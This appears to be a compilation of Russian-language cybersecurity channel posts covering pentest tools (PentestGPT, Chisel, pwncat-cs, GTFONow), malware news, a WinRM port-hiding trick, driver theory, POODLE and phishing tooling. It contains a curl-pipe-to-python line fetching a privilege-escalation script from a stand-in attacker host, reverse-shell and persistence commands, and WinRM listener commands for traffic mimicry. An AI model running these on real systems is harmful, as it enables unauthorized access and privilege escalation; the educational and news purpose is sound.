🤖 PentestGPT - это инструмент тестирования на проникновение, предоставляемый ChatGPT. Он предназначен для автоматизации процесса тестирования на проникновение. Он построен на основе ChatGPT и работает в интерактивном режиме. Данная утилита способна самостоятельно решать легкие и средние машины на HTB

🔸 Установка утилиты

pip3 install git+https://github.com/GreyDGL/PentestGPT

🔸 Импорт ключа
Для корректной работы нам понадобится ключ для доступа к API OpenAI

shell export OPENAI_API_KEY='<your key here>'

🔸 Проверка работоспособности

pentestgpt-connection

🔸 Запуск утилиты

pentestgpt --reasoning_model=gpt-4-turbo

После всех проделанных шагов вы можете начать общение с дообученым помощником, который может самостоятельно проводить базовые проверки

Исследователи из CloudSEK выявили тревожное обновление в деятельности ботнета Androxgh0st: с начала 2024 года он нацелен на веб-серверы и активно эксплуатирует уязвимости в известных технологиях, таких как Cisco ASA, Atlassian JIRA и различные PHP-фреймворки.

🗣️ Недавний отчет показал, что Androxgh0st теперь использует компоненты от ботнета Mozi, расширяя своё влияние на устройства интернета вещей (IoT) и возможное сотрудничество между двумя ботнетами.

Ключевые уязвимости, на которые нацелен Androxgh0st:

🔸 CVE-2017-9841 в PHPUnit, дающий бэкдор-доступ к вебсайтам
🔸 CVE-2018-15133 в Laravel, позволяющий выполнить зашифрованный код
🔸 CVE-2021-41773 в Apache, позволяющий атаки обхода путей

Mozi, ранее активно использовавший уязвимости в IoT-устройствах, таких как маршрутизаторы и DVR, был разгромлен в 2021 году. Однако Androxgh0st, судя по последним данным командных логов, внедрил Mozi-загрузки в свою инфраструктуру, что делает его ещё более опасным для IoT-среды.

#новости

🚩 Новые задания на платформе Codeby Games!

🔑 Категория Криптография — Широковещание

🔎 Категория OSINT — Кого ищем?

Приятного хакинга!

Chisel — это многофункциональная утилита для создания защищенных туннелей TCP/UDP поверх HTTP и HTTPS. Если вам нужно обойти firewall или организовать безопасную точку доступа в сети, Chisel может стать отличным решением. В новой статье разберем подробнее этот инструмент.

🔍 Что такое Chisel и как это работает?
Chisel — это компактное приложение, объединяющее в себе клиент и сервер для туннелирования TCP и UDP трафика. Используя HTTP или HTTPS, Chisel проходит через firewall, маскируясь под стандартный веб-трафик и работая поверх WebSocket. Это позволяет обмениваться данными через часто разрешенные порты (80 или 443), делая трафик менее заметным для фильтров.

❓ Почему это трудно обнаружить?
Chisel отправляет данные в зашифрованных WebSocket фреймах через стандартные порты. Даже глубокая проверка пакетов (DPI) часто не видит, что внутри трафика, так как данные зашифрованы и выглядят как обычная HTTPS-сессия. Это помогает обойти ограничения сети, включая NAT и прокси.

⚙️ Практическое применение Chisel
Для того чтобы разобраться, как это работает, мы проведем небольшой эксперимент с сервером и клиентом на Linux, установим Chisel и настроим туннель. В конце анализа разберем захваченный трафик и посмотрим, как Chisel шифрует его на уровне фреймов.

➡️ Читать подробнее

💻 pwncat-cs v0.5.4

Что не так с netcat ?

Пример классического подключения:

nc 1.1.1.1 4444
remote$ python -c "import pty; pty.spawn('/bin/bash')"
remote$ Ctrl + Z
local$ stty raw -echo
local$ fg



Надоело ? Мне тоже

Установка:

python3 -m venv pwncat-env

source pwncat-env/bin/activate

pip install pwncat-cs

Основные опции:

# Connect to a bind shell
pwncat-cs 10.10.10.10:4444

# Listen for reverse shell
pwncat-cs -lp 4444

# Connect via ssh
pwncat-cs user@10.10.10.10
pwncat-cs user:password@10.10.10.10
pwncat-cs -i id_rsa user@10.10.10.10

# SSH w/ non-standard port
pwncat-cs -p 2222 user@10.10.10.10
pwncat-cs user@10.10.10.10:2222

# Reconnect utilizing installed persistence
#   If reconnection fails and no protocol is specified,
#   SSH is used as a fallback.
pwncat-cs reconnect://user@10.10.10.10
pwncat-cs reconnect://user@c228fc49e515628a0c13bdc4759a12bf
pwncat-cs user@10.10.10.10
pwncat-cs c228fc49e515628a0c13bdc4759a12bf

Табы работают, по Ctrl + C сессия не рвется.
Переключение между режимами(local <> remote) Ctrl + D
Есть полезные фичи как Upload с хоста на жертву, так и наоборот Download.
Модули escalate и enumerate для ленивых

❗️ Вывод suid'ных бинарников

run enumerate types=file.suid

❗️ Задействует все режимы

run enumerate

💻 Download
❕ Docs

🔄😟 GTFONow v 0.3.0

Авто повышение привилегий на .nix подобных системах используя мисконфигурации в setuid/setgid файлах, capabilities и sudo привилегиях.
Разработано специально для CTF, но может использоваться и в реальных условиях. Информацию берет с известного ресурса GTFO

Использование:

python gtfonow.py [OPTIONS]

python gtfonow.py --command 'ls -la' --level 2 --risk 2

curl http://attacker.host/gtfonow.py | python

💻 Home

Для компании утечка данных — это не только риск потери информации, но и серьёзные репутационные и финансовые последствия. Все об утечке данных читайте в новой статье.

🗣️ Когда злоумышленники получают доступ к персональной, финансовой или коммерческой информации, последствия для бизнеса могут быть разрушительными: от потери клиентов до временной остановки бизнес-процессов.

Методы кражи данных, которые используют мошенники:
🔸Фишинг: Создание фейковых сайтов и поддельных писем, чтобы обманом получить у сотрудников доступ к данным.
🔸Брутфорс-атаки: Автоматический подбор паролей для доступа к аккаунтам и хранилищам.
🔸Программы-шпионы: Вирусы, которые внедряются в операционные системы и незаметно отправляют данные злоумышленникам.

✉️ Какие данные могут быть украдены?
Чаще всего атакуют персональные данные клиентов, финансовые сведения, бизнес-информацию, а также предметы интеллектуальной собственности, такие как патенты и разработки.

5 признаков уязвимости информации в компании:
🔸Высокая текучка сотрудников.
🔸Постоянные командировки с использованием рабочей техники.
🔸Активное взаимодействие с контрагентами, требующее обмена данными.
🔸Сложная IT-инфраструктура с распределёнными правами доступа.
🔸Обслуживание техники в сторонних сервисах.

В условиях, когда утечки данных могут затронуть любую компанию, важно принимать активные меры по защите информации, обучать сотрудников и контролировать все возможные каналы утечки.

➡️ Читать подробнее в блоге

Роскомнадзор работает над созданием национальной системы защиты IР-маршрутизации от внешних угроз. (это следует из Стратегии развития телекоммуникационной отрасли до 2035 г., утвержденной Правительством).

🔑Предполагаем, что речь идет о создании в России инфраструктуры для протокола
▶️RPKI (Resource Public Key Infrastructure/Инфраструктура открытых ключей ресурсов),
решение является расширением протокола
▶️BGP (Border Gateway Protocol/Протокол динамической маршрутизации), отвечающего за динамическую маршрутизацию в интернете.

⚡️Согласно заявлению ведомства, новая система обеспечит надежную защиту российских сетей от атак типа "DDoS", от попыток манипулирования трафиком и подмены IР-адресов.

🆕 Новые технологии, которые планируют внедрить в рамках данного проекта:
⏺️Система раннего обнаружения атак (мониторинг трафика для выявления подозрительной активности и блокирования атак на ранней стадии).
⏺️Централизованная система управления маршрутизацией (повышение устойчивости интернет-инфраструктуры путем распределения трафика и предотвращения перегрузок).
⏺️Система защиты от DNS-подмены (предотвращение подмены DNS-записей, которые могут перенаправлять пользователей на вредоносные сайты).

❗️Проект позволит значительно повысить уровень кибербезопасности в России и обеспечить надежную защиту российских пользователей от внешних угроз.

Многие трояны в ОС Android довольно примитивны, так как их задачей является лишь перенаправить пользователя на вредоносный сайт при открытии приложения. Однако специалисты из компании Dr.Web обнаружили новый вредонос Android.FakeApp.1669, который отличается использованием модифицированной библиотеки dnsjava.

😳 В настоящий момент варианты троянских программ Android.FakeApp.1669 были загружены через Google Play около 2 160 000 раз!

✏️Среди зараженных приложений можно выделить:
⏺️Split it: Checks and Tips
⏺️FlashPage parser
⏺️BeYummy - your cookbook
⏺️Memogen
⏺️Display Moving Message
⏺️WordCount

🎰 При запуске приложение получает с вредоносного DNS-сервера TXT-запись, содержащую зашифрованную целевую ссылку. Троян загружает её в WebView внутри своего окна поверх основного интерфейса. Ссылка ведет на сайт с длинной цепочкой перенаправлений, конечной точкой которой становится страница онлайн-казино.

❗️При этом сервер отдает TXT-запись только если зараженное устройство подключено к интернету через определенных провайдеров. В остальных случаях приложение предоставляет заявленный разработчиком функционал.

Злоумышленники обладают большими ресурсами и связями с другими группами для проведения масштабных кибератак. Их основная цель – кибершпионаж. Для проникновения в целевую сеть группа активно применяет эксплуатацию публично доступных сервисов на периметре, доступ через подрядчика и легитимные аккаунты.

В одном из расследованных кейсов специалисты наблюдали в журналах следующие запросы:

POST /wsman 443 – 45.12.67.18 HTTP/1.1 Ruby+WinRM+Client+(2.8.3,+ruby+2.7.2+(2020-10-01))

Как видно из запроса, использовался некоторый клиент для WinRM, написанный на Ruby. Но интересно тут указание порта 443, ведь WinRM работает на 5985, 5986 портах.

💻WinRM — это название как службы, так и протокола Windows, использующегося для удаленного управления, администрирования и мониторинга систем. Обычно используется злоумышленниками для перемещения в инфраструктуре жертвы.

⬇️Оказывается с помощью представленных ниже команд можно сконфигурировать WinRM так, чтобы в дополнении к стандартным портам добавлялись порты 80, 443.
⏺️winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
⏺️winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"}

✏️ Используя эту особенность, злоумышленники могут ввести в заблуждение исследователей безопасности, мимикрируя под обычный трафик в инфраструктуре.

Российский разработчик решений для инфраструктуры, Компания «Базис» представил обновленную версию своего продукта Basis Virtual Security 3.2, в котором более 100 новых функций и улучшений.

✔️ Основные изменения:
🔸 Возможность резервного копирования виртуальных машин. Причем возможность создания резервного копирования возможно как для работающих виртуальных машин, так и для остановленных. Для их хранения возможно использовать NFS-хранилище.
🔸 Доработан графический интерфейс Процесс резервного копирования и восстановления виртуальных машин для администраторов стало удобнее.
🔸 Обновленные инструменты для работы с контролем целостности виртуальных машин и работы с контрольными суммами.
🔸 Обновленные политики целостности. Теперь при нарушении целостности появилась возможность запрета запуска ВМ при нарушении контрольных сумм.
🔸 Появилось журналирование задачи подсчета контрольных сумм, а для их вычислений есть возможность использовать отечественные алгоритмы стандарта ГОСТ Р 34.11 – 2012.

Стоит отметить, что данный продукт получил соответствие требованиям ФСТЭК по 4 уровню доверия (УД4) достаточно быстро. Ранее компания уменьшила срок прохождения испытаний ФСТЭК с 6 месяцев до 3.

На фоне глобальных новостей по поводу импортзамещений данный релиз выглядит очень хорошим, и его использование совместно с другими платформами виртуализации поможет закрыть большинство технических мер защиты виртуальных сред.

#новости

В предыдущей статье мы копнули тему линий IRQ и приоритетов IRQL, но чтобы погрузиться в практику, нам нужно ещё немного теории. В мире драйверов WDM всё начинается с понимания базовых объектов драйвера и устройства — с того, что определяет его «скелет» и окружение. Об этом — в новой статье.

⚙️ Схема передачи управления

Система Windows виртуализирует память, разбивая физическую ОЗУ на 4 КБ фреймы, которым назначаются виртуальные адреса. Когда процесс создаётся, система выделяет ему страницы виртуальной памяти, храня ссылки на них в таблицах Page Directory, PDPT, PD, и PT. При этом 48-битный линейный адрес делится на пять частей, где каждый уровень таблиц содержит 512 записей, что в архитектуре x64 позволяет адресовать до 256 ТБ памяти (пополам между ядром и пользователем).

⚙️ DRIVER_OBJECT и DEVICE_OBJECT: Основные элементы драйвера

Что такое драйвер на уровне кода? По сути, это структура DRIVER_OBJECT, где описан весь функционал, который драйвер способен выполнить. Эта структура создаётся диспетчером ввода-вывода Windows, а в нашу функцию инициализации DriverEntry() передаётся лишь указатель на неё.

⚙️ IRP: Пакеты запросов к драйверу

IRP, или Input/Output Request Packet — своего рода джокер в системе запросов. Когда пользователь отправляет команду драйверу (например, DeviceIoControl()), создаётся IRP, который поступает драйверу через DEVICE_OBJECT->CurrentIrp. Этот пакет содержит все данные о запросе и предписывает драйверу, что делать дальше. Когда IRP обработан, диспетчер удаляет его, переходя в режим ожидания следующего запроса.

⚙️ Стек драйверов: FDO, PDO и FiDO

Каждое аппаратное устройство в модели WDM работает в связке с двумя типами драйверов: физическим (PDO) и функциональным (FDO). К ним может добавляться фильтрующий драйвер (FiDO), если требуется расширить возможности. Эти драйверы выстраиваются в стек, по которому передаются запросы IRP.

Запросы передаются по стеку сверху вниз: драйвер верхнего уровня обрабатывает IRP и может передать его ниже. Если драйвер FDO решает, что сам справится с запросом, он завершает обработку, отправив команду IoCompleteRequest().

✏️ Рекомендуемые команды WinDbg:
🔸 !drvobj — основная информация по DRIVER_OBJECT
🔸 !devobj — основные сведения об устройстве DEVICE_OBJECT
🔸 !devstack — позиция драйвера в стеке

➡️ Читать подробнее

Крутая возможность заявить о себе на VK Security Confab Max

11 декабря 2024 года пройдёт конференция по кибербезопасности — VK Security Confab Max.

Главные темы: SOC, AppSec, защита пользователей, облаков и инфраструктуры.

Программа обещает насыщенный день: технические доклады, нетворкинг, афтепати. Не можете приехать? Будет онлайн-трансляция!

Хочешь выступить? Подавай заявку до 29 ноября ➡️ тут
Новости и детали ➡️ тут

🚩 Новые задания на платформе Codeby Games!

👩‍💻  Категория Active Directory — Аноним

🌍 Категория Веб — Провальный код

Приятного хакинга!

POODLE — это опасная уязвимость в старом криптографическом протоколе SSL 3.0. Эксплойт позволяет злоумышленникам расшифровывать данные, которые пользователи передают на уязвимых сайтах, и даже захватывать их сессии.

✏️ Что такое SSL и CBC?
SSL (Secure Socket Layer) — протокол, обеспечивающий защищённую передачу данных. Он использует асимметричное шифрование для аутентификации и симметричное для конфиденциальности.

В случае с POODLE наибольшая проблема кроется в режиме шифрования CBC (Cipher Block Chaining), где каждый блок данных зашифрован на основе предыдущего, что создаёт слабое место для потенциальной атаки.

⚙️ Как работает POODLE?
Чтобы успешно провести атаку, злоумышленник сначала инициирует атаку «человек посередине» (MITM) и выполняет «downgrade dance» — принудительно понижает версию соединения до уязвимого SSL 3.0. В результате можно расшифровать данные в зашифрованной сессии, а злоумышленник получает доступ к cookies, паролям и другим чувствительным данным.

✔️ Почему это важно?
POODLE показывает, как устаревшие протоколы, если их оставить включёнными, могут представлять угрозу даже для современных систем. Многие системы всё ещё поддерживают SSL 3.0 ради обратной совместимости, что и делает их уязвимыми для POODLE.

⭐️ Как защититься?
В большинстве случаев поможет отключение поддержки SSL 3.0 и использование более современных протоколов, таких как TLS 1.2 или выше. В статье разбираются детали атаки и пошаговый анализ того, как хакеры используют POODLE для расшифровки данных.

➡️ Читать подробнее в блоге

В киберкриминальном мире появился новый фишинговый инструмент — GoIssue, нацеленный на пользователей GitHub и всю софтверную экосистему. 👀 GoIssue позволяет злоумышленникам собирать email-адреса с профилей GitHub и запускать массовые фишинговые атаки, что повышает риск кражи исходного кода и проникновения в корпоративные сети.

Повышенный риск для GitHub и организаций 🛡
🔸По данным SlashNext, GoIssue представляет собой серьёзную угрозу для разработчиков, использующих GitHub. Захватив учетные данные одного разработчика, злоумышленники могут развернуть атаки на цепочки поставок, создавая уязвимости для всей компании.
🔸Фишинговые кампании, запущенные через GoIssue, могут привести к краже учетных данных, загрузке вредоносного ПО или несанкционированному доступу к приватным репозиториям.

Как работает GoIssue? ⚙️
Инструмент автоматизирует сбор email-адресов с GitHub, используя токены и фильтры по критериям — например, членству в организациях и активности. Затем отправляются фишинговые сообщения, имитирующие уведомления GitHub, которые могут обходить спам-фильтры и попасть прямо в почтовый ящик разработчиков.

Стоимость и доступность GoIssue
GoIssue продается за $700 за индивидуальную версию или $3,000 за полный исходный код, предоставляя анонимность через прокси-сети и позволяя запускать высокотаргетированные фишинговые кампании.

Мнение экспертов:

🗣️ «Появление GoIssue сигнализирует о новой эре, когда платформы для разработчиков становятся полем боя, и защита должна адаптироваться», — прокомментировал Джейсон Сороко из Sectigo.

🗣️ «Не менее важно дать пользователям навыки распознавать подозрительные письма и сообщать о них, а также интегрировать человеческую разведку в центр системы безопасности», — добавил Мика Аалто, сооснователь Hoxhunt.

#новости